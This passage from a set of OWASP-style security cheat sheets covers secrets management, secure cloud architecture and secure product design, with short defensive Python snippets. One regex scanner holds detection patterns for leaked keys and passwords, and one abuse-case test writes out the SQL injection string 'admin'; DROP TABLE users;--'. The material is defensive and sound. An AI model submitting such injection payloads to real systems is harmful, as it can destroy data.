"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#6-implementation-guidance","title":"6 Implementation Guidance","text":"

In this section, we will discuss implementation. Note that it is always best to refer to the official documentation of the secrets management system of choice for the actual implementation as it will be more up to date than any secondary document such as this cheat sheet.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#61-key-material-management-policies","title":"6.1 Key Material Management Policies","text":"

Key material management is discussed in the Key Management Cheat Sheet.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#62-dynamic-vs-static-use-cases","title":"6.2 Dynamic vs Static Use Cases","text":"

We see the following use cases for dynamic secrets, amongst others:

Note that these dynamic secrets often need to be created with the service we need to connect to. To create these types of dynamic secrets, we usually require long term static secrets to create the dynamic secrets themselves. Other static use cases:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#63-ensure-limitations-are-in-place","title":"6.3 Ensure limitations are in place","text":"

Secrets should never be retrievable by everyone and everything. Always make sure that you put guardrails in place:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#64-security-event-monitoring-is-key","title":"6.4 Security Event Monitoring is Key","text":"

Continually monitor who/what, from which IP, and with what methodology accesses the secret. There are various patterns you need to look out for, including but not limited to:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#65-usability","title":"6.5 Usability","text":"

Ensure that your secrets management solution is easy to use, as you do not want people to work around it or use it ineffectively due to complexity. This usability requires:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#7-encryption","title":"7 Encryption","text":"

Secrets Management goes hand in hand with encryption. After all, secrets must be stored encrypted somewhere to protect their confidentiality and integrity.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#71-encryption-types-to-use","title":"7.1 Encryption Types to Use","text":"

You can use various encryption types to secure a secret as long as they provide sufficient security, including adequate resistance against quantum computing-based attacks. Given that this is a moving field, it is best to take a look at sources like keylength.com, which enumerate up to date recommendations on the usage of encryption types and key lengths for existing standards, as well as the NSA's Commercial National Security Algorithm Suite 2.0 which enumerates quantum resistant algorithms.

Please note that, in all cases, we should preferably select an algorithm that provides confidentiality and authenticity at the same time (authenticated encryption), such as AES-256 using GCM (Galois/Counter Mode), or a combination of ChaCha20 and Poly1305, according to the best practices in the field.
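
For illustration, the snippet below shows authenticated encryption of a secret with ChaCha20-Poly1305 from the Python `cryptography` package (the `AESGCM` class works the same way for AES-256-GCM); the associated data value is an illustrative way of binding the ciphertext to its context.

```python
import os
from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305

key = ChaCha20Poly1305.generate_key()
nonce = os.urandom(12)                 # never reuse a nonce with the same key
aead = ChaCha20Poly1305(key)

ciphertext = aead.encrypt(nonce, b"my-secret-value", b"secret-id:prod/db")  # AAD binds context
plaintext = aead.decrypt(nonce, ciphertext, b"secret-id:prod/db")           # raises if tampered with
```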

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#72-convergent-encryption","title":"7.2 Convergent Encryption","text":"

Convergent Encryption ensures that a given plaintext and key always result in the same ciphertext. This can help detect possible re-use of secrets, as re-used secrets result in the same ciphertext. The challenge with enabling convergent encryption is that it allows attackers to use the system to generate ciphertexts for candidate strings and compare them against stored ciphertexts, potentially deriving the plaintext secret. Given the algorithm and key, you can mitigate this risk if the convergent crypto system you use imposes sufficient resource challenges during encryption. Another factor that can help reduce the risk is ensuring that a secret is of adequate length, further hampering the guess-iteration time required.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#73-where-to-store-the-encryption-keys","title":"7.3 Where to store the Encryption Keys?","text":"

You should not store keys next to the secrets they encrypt, except if those keys are encrypted themselves (see envelope encryption). Start by consulting the Key Management Cheat Sheet on where and how to store the encryption and possible HMAC keys.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#74-encryption-as-a-service-eaas","title":"7.4 Encryption as a Service (EaaS)","text":"

EaaS is a model in which users subscribe to a cloud-based encryption service without having to install encryption on their own systems. Using EaaS, you can get the following benefits:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#8-detection","title":"8 Detection","text":"

There are many approaches to secrets detection and some very useful open source projects to help with this. The Yelp Detect Secrets project is mature and has signature matching for around 20 secrets. For more information on other tools to help you in the detection space, check out the Secrets Detection topic on GitHub.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#81-general-detection-approaches","title":"8.1 General detection approaches","text":"

Shift-left and DevSecOps principles apply to secrets detection as well. These general approaches below aim to consider secrets earlier and evolve the practice over time.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#82-types-of-secrets-to-be-detected","title":"8.2 Types of secrets to be detected","text":"

Many types of secrets exist, and you should consider signatures for each to ensure accurate detection for all. Among the more common types are:

For more fun learning about secrets and practice rooting them out check out the Wrong Secrets project.
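
As a toy illustration of signature-based detection, the sketch below scans files with a couple of example regexes; the patterns are illustrative only, and real tools such as detect-secrets combine many more signatures with entropy analysis and baselining.

```python
import re
import sys

# Illustrative signatures only; production scanners ship far more, plus entropy checks.
SIGNATURES = {
    "AWS access key ID": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Private key header": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
    "Hardcoded password assignment": re.compile(r"(?i)password\s*=\s*['\"][^'\"]{8,}['\"]"),
}

def scan(path: str) -> list:
    findings = []
    with open(path, errors="ignore") as handle:
        for lineno, line in enumerate(handle, start=1):
            for name, pattern in SIGNATURES.items():
                if pattern.search(line):
                    findings.append(f"{path}:{lineno}: possible {name}")
    return findings

if __name__ == "__main__":
    results = [hit for path in sys.argv[1:] for hit in scan(path)]
    print("\n".join(results))
    sys.exit(1 if results else 0)
```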

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#83-detection-lifecycle","title":"8.3 Detection lifecycle","text":"

Secrets are like any other authorization token. They should:

Create detection rules for each of the stages of the secret lifecycle.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#84-documentation-for-how-to-detect-secrets","title":"8.4 Documentation for how to detect secrets","text":"

Create documentation and update it regularly to inform the developer community about the procedures and systems available at your organization, what types of secrets management you expect, how to test for secrets, and what to do in the event of detected secrets.

Documentation should:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#9-incident-response","title":"9 Incident Response","text":"

Quick response in the event of a secret exposure is perhaps one of the most critical considerations for secrets management.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#91-documentation","title":"9.1 Documentation","text":"

Incident response in the event of secret exposure should ensure that everyone in the chain of custody is aware and understands how to respond. This includes application creators (every member of a development team), information security, and technology leadership.

Documentation must include:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#92-remediation","title":"9.2 Remediation","text":"

The primary goal of incident response is rapid response and containment.

Containment should follow these procedures:

  1. Revocation: Keys that were exposed should undergo immediate revocation. The secret must be able to be de-authorized quickly, and systems must be in place to identify the revocation status.
  2. Rotation: A new secret must be able to be quickly created and implemented, preferably via an automated process to ensure repeatability, low rate of implementation error, and least-privilege (not directly human-readable).
  3. Deletion: Secrets revoked/rotated must be removed from the exposed system immediately, including secrets discovered in code or logs. Secrets in code could have the commit history for the exposure squashed to before the introduction of the secret; however, this may introduce other problems, as it rewrites git history and will break any other links to a given commit. If you decide to do this, be aware of the consequences and plan accordingly. Secrets in logs must have a process for removing the secret while maintaining log integrity.
  4. Logging: Incident response teams must have access to information about the lifecycle of a secret to aid in containment and remediation, including:
"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#93-logging","title":"9.3 Logging","text":"

Additional considerations for logging of secrets usage should include:

Consider using a standardized logging format and vocabulary such as the Logging Vocabulary Cheat Sheet to ensure that all necessary information is logged.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#10-related-cheat-sheets-further-reading","title":"10 Related Cheat Sheets & further reading","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html","title":"Cloud Architecture Security Cheat Sheet","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet will discuss common and necessary security patterns to follow when creating and reviewing cloud architectures. Each section will cover a specific security guideline or cloud design decision to consider. This sheet is written for a medium to large scale enterprise system, so additional overhead elements will be discussed, which may be unnecessary for smaller organizations.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#risk-analysis-threat-modeling-and-attack-surface-assessments","title":"Risk Analysis, Threat Modeling, and Attack Surface Assessments","text":"

With any application architecture, understanding the risks and threats is extremely important for proper security. No one can spend their entire budget or bandwidth focused on security, so properly allocating security resources is necessary. Therefore, enterprises must perform risk assessments, threat modeling activities, and attack surface assessments to identify the following:

This is all necessary to properly scope the security of an architecture. However, these are subjects that can/should be discussed in greater detail. Use the resources linked below to investigate further as part of a healthy secure architecture conversation.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#public-and-private-components","title":"Public and Private Components","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#secure-object-storage","title":"Secure Object Storage","text":"

Object storage usually has the following options for accessing data:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#iam-access","title":"IAM Access","text":"

This method involves indirect access through tooling such as a managed or self-managed service running on ephemeral or persistent infrastructure. This infrastructure contains a persistent control plane IAM credential, which interacts with the object storage on the user's behalf. The method is best used when the application has other user interfaces or data systems available, when it is important to hide as much of the storage system as possible, or when the information shouldn't/won't be seen by an end user (metadata). It can be used in combination with web authentication and logging to better track and control access to resources. The key security concern for this approach is relying on developed code or policies, which could contain weaknesses.

| Pros | Cons |
|------|------|
| No direct access to data | Potential use of broad IAM policy |
| No user visibility to object storage | Credential loss gives access to control plane APIs |
| Identifiable and loggable access | Credentials could be hardcoded |

This approach is acceptable for sensitive user data, but must follow rigorous coding and cloud best practices in order to properly secure the data.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#signed-urls","title":"Signed URLs","text":"

URL signing for object storage involves using some method of either statically or dynamically generating URLs, which cryptographically guarantee that an entity can access a resource in storage. This is best used when direct access to specific user files is necessary or preferred, as there is no file transfer overhead. It is advisable to only use this method for user data which is not very sensitive. This method can be secure, but has notable cons. Code injection may still be possible if the method of signed URL generation is custom, dynamic and injectable, and anyone can access the resource anonymously if given the URL. Developers must also consider if and when the signed URL should expire, adding to the complexity of the approach.
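
A minimal sketch of generating such a URL with boto3 is shown below; the bucket and key are placeholders, and the short expiry is an example value that limits how long anyone holding the URL can use it.

```python
import boto3

s3 = boto3.client("s3")

url = s3.generate_presigned_url(
    "get_object",
    Params={"Bucket": "example-user-uploads", "Key": "reports/user-123/statement.pdf"},  # placeholders
    ExpiresIn=300,  # seconds; anyone with the URL can fetch the object until it expires
)
```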

| Pros | Cons |
|------|------|
| Access to only one resource | Anonymous access |
| Minimal user visibility to object storage | Anyone can access with URL |
| Efficient file transfer | Possibility of injection with custom code |
"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#public-object-storage","title":"Public Object Storage","text":"

This is not an advisable method for resource storage and distribution, and should only be used for public, non-sensitive, generic resources. This storage approach will provide threat actors additional reconnaissance into a cloud environment, and any data which is stored in this configuration for any period of time must be considered publicly accessed (leaked to the public).

| Pros | Cons |
|------|------|
| Efficient access to many resources | Anyone can access/No privacy |
| Simple public file share | Unauthenticated access to objects |
| Visibility into full file system | Accidentally leak stored info |
"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#vpcs-and-subnets","title":"VPCs and Subnets","text":"

Virtual Private Clouds (VPC) and public/private network subnets allow an application and its network to be segmented into distinct chunks, adding layers of security within a cloud system. Unlike other private vs public trade-offs, an application will likely incorporate most or all of these components in a mature architecture. Each is explained below.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#vpcs","title":"VPCs","text":"

VPCs are used to create network boundaries within an application, wherein components can talk to each other, much like a physical network in a data center. The VPC will be made up of some number of subnets, both public and private. VPCs can be used to:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#public-subnets","title":"Public Subnets","text":"

Public subnets house components which will have an internet facing presence. The subnet will contain network routing elements to allow components within the subnet to connect directly to the internet. Some use cases include:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#private-subnets","title":"Private Subnets","text":"

Private subnets house components which should not have direct internet access. The subnet will likely contain network routing to connect it to public subnets, to receive internet traffic in a structured and protected way. Private subnets are great for:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#simple-architecture-example","title":"Simple Architecture Example","text":"

Consider the simple architecture diagram below. A VPC will house all of the components for the application, but elements will be in a specific subnet depending on their role within the system. The normal flow for interacting with this application might look like:

  1. Accessing the application through some sort of internet gateway, API gateway or other internet facing component.
  2. This gateway connects to a load balancer or a web server in a public subnet. Both components provide public facing functions and are secured accordingly.
  3. These components then interact with their appropriate backend counterparts, a database or backend server, contained in a private subnet. These connections are more limited, preventing extraneous access to the possibly \"soft\" backend systems.

Note: This diagram intentionally skips routing and IAM elements for subnet interfacing, for simplicity and to be service provider agnostic.

This architecture prevents less hardened backend components or higher risk services like databases from being exposed to the internet directly. It also provides common, public functionality access to the internet to avoid additional routing overhead. This architecture can be secured more easily by focusing on security at the entry points and separating functionality, putting non-public or sensitive information inside a private subnet where it will be harder to access by external parties.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#trust-boundaries","title":"Trust Boundaries","text":"

Trust boundaries are connections between components within a system where a trust decision has to be made by the components. Put another way, a trust boundary is a point where two components with potentially different trust levels meet. These boundaries can range in scale, from the degrees of trust given to users interacting with an application, to trusting or verifying specific claims between code functions or components within a cloud architecture. Generally speaking, however, trusting each component to perform its function correctly and securely suffices. Therefore, trust boundaries will likely occur in the connections between cloud components, and between the application and third party elements, like end users and other vendors.

As an example, consider the architecture below. An API gateway connects to a compute instance (ephemeral or persistent), which then accesses a persistent storage resource. Separately, there exists a server which can verify the authentication, authorization and/or identity of the caller. This is a generic representation of an OAuth, IAM or directory system, which controls access to these resources. Additionally, there exists an Ephemeral IAM server which controls access for the stored resources (using an approach like the IAM Access section above). As shown by the dotted lines, trust boundaries exist between each compute component, the API gateway and the auth/identity server, even though many or all of the elements could be in the same application.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#exploring-different-levels-of-trust","title":"Exploring Different Levels of Trust","text":"

Architects have to select a trust configuration between components, using quantitative factors like risk score/tolerance and velocity of the project, as well as subjective security goals. Each example below details trust boundary relationships to better explain the implications of trusting a certain resource. The threat level of a specific resource, shown as a color from green (safe) to red (dangerous), outlines which resources shouldn't be trusted.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#1-no-trust-example","title":"1. No trust example","text":"

As shown in the diagram below, this example outlines a model where no component trusts any other component, regardless of criticality or threat level. This type of trust configuration would likely be used for incredibly high risk applications, where either very personal data or important business data is contained, or where the application as a whole has an extremely high business criticality.

Notice that both the API gateway and compute components call out to the auth/identity server. This implies that no data passing between these components, even when right next to each other \"inside\" the application, is considered trusted. The compute instance must then assume an ephemeral identity to access the storage, as the compute instance isn't trusted to a specific resource even if the user is trusted to the instance.

Also note the lack of trust between the auth/identity server and ephemeral IAM server and each component. While not displayed in the diagram, this would have additional impacts, like more rigorous checks before authentication, and possibly more overhead dedicated to cryptographic operations.

This could be a necessary approach for applications found in financial, military or critical infrastructure systems. However, security must be careful when advocating for this model, as it will have significant performance and maintenance drawbacks.

| Pros | Cons |
|------|------|
| High assurance of data integrity | Slow and inefficient |
| Defense in depth | Complicated |
|  | Likely more expensive |
"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#2-high-trust-example","title":"2. High trust example","text":"

Next, consider the opposite approach, where everything is trusted. In this instance, the \"dangerous\" user input is trusted and essentially handed directly to a high criticality business component. The auth/identity resource is not used at all. In this instance, there is a higher likelihood of a successful attack against the system, because there are no controls in place to prevent it. Additionally, this setup could be considered wasteful, as both the auth/identity and ephemeral IAM servers are not necessarily performing their intended function. (These could be shared corporate resources that aren't being used to their full potential).

This is an unlikely architecture for all but the simplest and lowest risk applications. Do not use this trust boundary configuration unless there is no sensitive content to protect or efficiency is the only metric for success. Trusting user input is never recommended, even in low risk applications.

| Pros | Cons |
|------|------|
| Efficient | Insecure |
| Simple | Potentially wasteful |
|  | High risk of compromise |
"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#3-some-trust-example","title":"3. Some trust example","text":"

Most applications will use a trust boundary configuration like this. Using knowledge from a risk and attack surface analysis, security can reasonably assign trust to low risk components or processes, and verify only when necessary. This prevents wasting valuable security resources, but also limits the complexity and efficiency loss due to additional security overhead.

Notice in this example that the API gateway checks the auth/identity of a user, then immediately passes the request on to the compute instance. The instance doesn't need to re-verify, and performs its operation. However, as the compute instance is working with untrusted user inputs (designated yellow for some trust), it is still necessary to assume an ephemeral identity to access the storage system.

By nature, this approach limits the pros and cons of both previous examples. This model will likely be used for most applications, unless the benefits of the above examples are necessary to meet business requirements.

| Pros | Cons |
|------|------|
| Secured based on risk | Known gaps in security |
| Cost/Efficiency derived from criticality |  |

Note: This trust methodology diverges from Zero Trust. For a more in depth look at that topic, check out CISA's Zero Trust Maturity Model.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#security-tooling","title":"Security Tooling","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#web-application-firewall","title":"Web Application Firewall","text":"

Web application firewalls (WAF) are used to monitor or block common attack payloads (like XSS and SQLi), or allow only specific request types and patterns. Applications should use them as a first line of defense, attaching them to entry points like load balancers or API gateways, to handle potentially malicious content before it reaches application code. Cloud providers curate base rule sets which will block or monitor common malicious payloads:

By design these rule sets are generic and will not cover every attack type an application will face. Consider creating custom rules which will fit the application's specific security needs, like:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#logging-monitoring","title":"Logging & Monitoring","text":"

Logging and monitoring are required for a truly secure application. Developers should know exactly what is going on in their environment, making use of alerting mechanisms to warn engineers when systems are not working as expected. Additionally, in the event of a security incident, logging should be verbose enough to track a threat actor through an entire application, and provide enough knowledge for respondents to understand what actions were taken against what resources. Note that proper logging and monitoring can be expensive, and risk/cost trade-offs should be discussed when putting logging in place.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#logging","title":"Logging","text":"

For proper logging, consider:

Legal and compliance representatives should weigh in on log retention times for the specific application.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#monitoring","title":"Monitoring","text":"

For proper monitoring consider adding:

Anomalies by count and type can vary wildly from app to app. A proper understanding of what qualifies as an anomaly requires an environment-specific baseline. Therefore, the percentages mentioned above should be chosen based on that baseline, in addition to considerations like risk and team response capacity.

WAFs can also have monitoring or alerting attached to them for counting malicious payloads or (in some cases) anomalous activity detection.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#ddos-protection","title":"DDoS Protection","text":"

Cloud service companies offer a range of simple and advanced DDoS protection products, depending on application needs. Simple DDoS protection can often be employed using WAFs with rate limits and route blocking rules, while more advanced protection may require specific managed tooling offered by the cloud provider. Examples include:

The decision to enable advanced DDoS protections for a specific application should be based on the risk and business criticality of the application, taking into account mitigating factors and cost (these services can be very inexpensive compared to large company budgets).

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#self-managed-tooling-maintenance","title":"Self-managed tooling maintenance","text":"

Cloud providers generally offer tooling on a spectrum of management. Fully managed services leave very little for the end developer to handle besides coding functionality, while self-managed systems require much more overhead to maintain.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#update-strategy-for-self-managed-services","title":"Update Strategy for Self-managed Services","text":"

Self-managed tooling will require additional overhead by developers and support engineers. Depending on the tool, basic version updates, upgrades to images like AMIs or Compute Images, or other operating system level maintenance will be required. Use automation to regularly update minor versions or images, and schedule time in development cycles for refreshing stale resources.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#avoid-gaps-in-managed-service-security","title":"Avoid Gaps in Managed Service Security","text":"

Managed services will offer some level of security, like updating and securing the underlying hardware which runs application code. However, the development team is still responsible for many aspects of security in the system. Ensure developers understand what security will be their responsibility based on tool selection. Likely the following will be partially or wholly the responsibility of the developer:

Use documentation from the cloud provider to understand which security will be the responsibility of which party. Examples of this research for serverless functions:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html","title":"Secure Product Design Cheat Sheet","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The purpose of Secure Product Design is to ensure that all products meet or exceed the security requirements laid down by the organization as part of the development lifecycle and to ensure that all security decisions made about the product being developed are explicit choices and result in the correct level of security for the product being developed.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#methodology","title":"Methodology","text":"

As a basic start, establish secure defaults, minimise the attack surface area, and fail securely to those well-defined and understood defaults.

Secure Product Design comes about through two processes:

  1. Product Inception; and
  2. Product Design

The first process happens when a product is conceived, or when an existing product is being re-invented. The latter is continuous, evolutionary, and done in an agile way, close to where the code is being written.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#security-principles","title":"Security Principles","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#1-the-principle-of-least-privilege-and-separation-of-duties","title":"1. The principle of Least Privilege and Separation of Duties","text":"

Least Privilege is a security principle that states that users should only be given the minimum amount of access necessary to perform their job. This means that users should only be given access to the resources they need to do their job, and no more. This helps to reduce the risk of unauthorized access to sensitive data or systems, as users are only able to access the resources they need. Least Privilege is an important security principle that should be followed in order to ensure the security of an organization's data and systems.

Separation of duties is a fundamental principle of internal control in business and organizations. It is a system of checks and balances that ensures that no single individual has control over all aspects of a transaction. This is done by assigning different tasks to different people, so that no one person has control over the entire process. This helps to reduce the risk of fraud and errors, as well as ensuring that all tasks are completed in a timely manner. Separation of duties is an important part of any organization's internal control system, and is essential for maintaining the integrity of the organization's financial records.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#2-the-principle-of-defense-in-depth","title":"2. The principle of Defense-in-Depth","text":"

The principle of Defense-in-Depth is a security strategy that involves multiple layers of security controls to protect an organization's assets. It is based on the idea that if one layer of security fails, the other layers will still be able to protect the asset. The layers of security can include physical security, network security, application security, and data security. The goal of Defense-in-Depth is to create a secure environment that is resilient to attack and can quickly detect and respond to any security incidents. By implementing multiple layers of security, organizations can reduce the risk of a successful attack and minimize the damage caused by any successful attack.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#3-the-principle-of-zero-trust","title":"3. The principle of Zero Trust","text":"

Zero Trust is a security model that assumes that all users, devices, and networks are untrusted and must be verified before access is granted. It is based on the idea that organizations should not trust any user, device, or network, even if they are inside the organization's network. Instead, all requests for access must be authenticated and authorized before access is granted. Zero Trust also requires organizations to continuously monitor and audit user activity to ensure that access is only granted to those who need it. This model is designed to reduce the risk of data breaches and other security incidents by ensuring that only authorized users have access to sensitive data.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#4-the-principle-of-security-in-the-open","title":"4. The principle of Security-in-the-Open","text":"

Security-in-the-Open is a concept that emphasizes the importance of security in open source software development. It focuses on the need for developers to be aware of the security implications of their code and to take steps to ensure that their code is secure. This includes using secure coding practices, testing for vulnerabilities, and using secure development tools. Security-in-the-Open also encourages developers to collaborate with security experts to ensure that their code is secure.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#security-focus-areas","title":"Security Focus Areas","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#1-context","title":"1. Context","text":"

Where does this application under consideration fit into the ecosystem of the organization, which departments use it and for what reason? What kinds of data might it contain, and what is the risk profile as a result?

The processes employed to build the security context for an application include Threat Modeling - which results in security related stories being added during Product Design at every iteration of product delivery - and when performing a Business Impact Assessment - which results in setting the correct Product Security Levels for a given product during Product Inception.

Context is all-important because over-engineering for security can have even greater cost implications than over-engineering for scale or performance, but under-engineering can have devastating consequences too.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#2-components","title":"2. Components","text":"

From libraries in use by the application (selected during any Product Design stage) through to external services it might make use of (changes to which happen during Product Inception), what makes up this application and how are those parts kept secure? In order to do this, we leverage a library of secure design patterns and ready-to-use components defined in your Golden Path / Paved Road documentation and by analyzing those choices through Threat Modeling.

A part of this component review must also include the more commercial aspects of selecting the right components (licensing and maintenance) as well as the limits on usage that might be required.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#3-connections","title":"3. Connections","text":"

How do you interact with this application and how does it connect to those components and services mentioned before? Where is the data stored and how is it accessed? Connections can also describe any intentional lack of connections. Think about the segregation of tiers that might be required depending on the Product Security Levels required and the potential segregation of data or whole environments if required for different tenants.

Adding (or removing) connections is probably a sign that Product Inception is happening.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#4-code","title":"4. Code","text":"

Code is the ultimate expression of the intention for a product and as such it must be functional first and foremost. But there is a quality to how that functionality is provided that must meet or exceed the expectations of it.

Some basics of secure coding include:

  1. Input validation: Verify that all input data is valid and of the expected type, format, and length before processing it. This can help prevent attacks such as SQL injection and buffer overflows.
  2. Error handling: Handle errors and exceptions in a secure manner, such as by logging them in a secure way and not disclosing sensitive information to an attacker.
  3. Authentication and Authorization: Implement strong authentication and authorization mechanisms to ensure that only authorized users can access sensitive data and resources.
  4. Cryptography: Use cryptographic functions and protocols to protect data in transit and at rest, such as HTTPS and encryption - the expected levels for a given Product Security Level can often be found by reviewing your Golden Path / Paved Road documentation.
  5. Least privilege: Use the principle of the least privilege when writing code, such that the code and the system it runs on are given the minimum access rights necessary to perform their functions.
  6. Secure memory management: Use high-level languages recommended in your Golden Path / Paved Road documentation or properly manage memory to prevent memory-related vulnerabilities such as buffer overflows and use-after-free.
  7. Avoiding hardcoded secrets: Hardcoded secrets such as passwords and encryption keys should be avoided in the code and should be stored in a secure storage.
  8. Security testing: Test the software for security vulnerabilities during development and just prior to deployment.
  9. Auditing and reviewing the code: Regularly audit and review the code for security vulnerabilities, such as by using automated tools or having a third party review the code.
  10. Keeping up-to-date: Keep the code up-to-date with the latest security best practices and vulnerability fixes to ensure that the software is as secure as possible.

Ensure that you integrate plausibility checks at each tier of your application (e.g., from frontend to backend) and ensure that you write unit and integration tests to validate that all threats discovered during Threat Modeling have been mitigated to a level of risk acceptable to the organization. Use that to compile use-cases and abuse-cases for each tier of your application.
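
As a small example of such a plausibility check and a matching abuse-case test, the snippet below validates one field at a backend tier; the field name, format, and limits are illustrative assumptions.

```python
import re

USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{3,32}$")  # expected type, format, and length

def validate_username(value: str) -> str:
    """Reject implausible input before it reaches business logic or queries."""
    if not isinstance(value, str) or not USERNAME_RE.fullmatch(value):
        raise ValueError("invalid username")
    return value

def test_rejects_injection_attempt():
    # Abuse case derived from threat modeling: SQL meta-characters must be rejected.
    try:
        validate_username("admin'; DROP TABLE users;--")
    except ValueError:
        return
    raise AssertionError("expected the input to be rejected")
```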

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#5-configuration","title":"5. Configuration","text":"

Building an application securely can all too easily be undone if it's not securely configured. At a minimum we should ensure the following:

  1. Bearing in mind the principle of Least Privilege: Limit the access and permissions of system components and users to the minimum required to perform their tasks.
  2. Remembering Defense-in-Depth: Implement multiple layers of security controls to protect against a wide range of threats.
  3. Ensuring Secure by Default: Configure systems and software to be secure by default, with minimal manual setup or configuration required.
  4. Secure Data: Protect sensitive data, such as personal information and financial data, by encrypting it in transit and at rest. Protecting that data also means ensuring it's correctly backed up and that the data retention is set correctly for the desired Product Security Level.
  5. Plan to have the configuration Fail Securely: Design systems to fail in a secure state, rather than exposing vulnerabilities when they malfunction.
  6. Always use Secure Communications: Use secure protocols for communication, such as HTTPS, to protect against eavesdropping and tampering.
  7. Perform regular updates - or leverage maintained images: Keeping software, docker images and base operating systems up-to-date with the latest security patches is an essential part of maintaining a secure system.
  8. Have a practiced Security Incident response plan: Having a plan in place for how to respond to a security incident is essential for minimizing the damage caused by any successful attack and a crucial part of the Product Support Model.

Details of how to precisely ensure secure configuration can be found in the Infrastructure as Code Security Cheat Sheet.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html","title":"Securing Cascading Style Sheets Cheat Sheet","text":""},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The goal of this CSS (Not XSS, but Cascading Style Sheet) Cheat Sheet is to inform Programmers, Testers, Security Analysts, Front-End Developers and anyone who is interested in Web Application Security to use these recommendations or requirements in order to achieve better security when authoring Cascading Style Sheets.

Let's demonstrate this risk with an example:

Santhosh is a programmer who works for a company called X and authors a Cascading Style Sheet to implement styling of the web application. The application for which he is writing CSS Code has various roles like Student, Teacher, Super User & Administrator and these roles have different permissions (PBAC - Permission Based Access Control) and Roles (RBAC - Role Based Access Control). Not only do these roles have different access controls, but these roles could also have different styling for webpages that might be specific to an individual or group of roles.

Santhosh thinks that it would be a great optimization to create a \"global styling\" CSS file which has all the CSS styling/selectors for all of the roles. According to their role, a specific feature or user interface element will be rendered. For instance, Administrator will have different features compared to Student, Teacher or SuperUser. However, some permissions or features may be common to some roles.

